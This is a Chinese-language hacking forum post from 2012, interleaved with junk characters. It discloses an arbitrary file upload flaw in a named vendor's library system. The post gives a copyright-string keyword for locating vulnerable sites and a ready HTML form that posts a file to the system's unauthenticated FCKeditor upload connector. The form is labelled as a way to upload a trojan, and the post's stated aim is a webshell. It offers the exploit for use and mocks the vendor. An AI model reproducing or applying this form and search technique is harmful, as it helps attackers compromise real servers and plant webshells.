主题:图书馆系统任意文件上传漏洞
" d3 G' U0 d X$ c* B' ^6 ]; f 作者:冰锋刺客$ \0 r+ B- n+ ?0 Y
厂商:点击书(dianjishu.com)+ R7 e7 T' M* X' A2 U9 M
日期:2012-6-21
9 r# o5 s) ` k+ z& v3 c5 [ {
' e0 H+ ]& P* F: }% `I 概述. _) }: G4 P$ T; ?3 h
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell5 e0 L% t8 @( f! R+ a( K
II 简介$ R( V% Z- ]& {9 G
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"; g; T8 ~1 l0 R5 I
补充一个漏洞7 I" Y7 J( o% a+ `
<form id="frmUpload" enctype="multipart/form-data", C! v9 h7 R* m, r4 g
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>- H0 `+ Y4 W+ M
<input id="btnUpload" type="submit" value="操翻他"># K) d6 p$ {; z( l: T
</form>4 O9 i# u7 M, L8 o
你们懂的
& C( q; Z- m2 ^7 p; z 那傻逼提供还需要改包. `& Z! @! W0 j6 W0 b0 y. m5 r
自己看了下源代码发现fckeditor
1 j& f* H+ R+ {8 F( C6 J 直接秒杀' ?4 {$ t0 g7 W( Y( M! I! U0 B
|
发表于 2012-9-10 21:20:59
收藏
支持
反对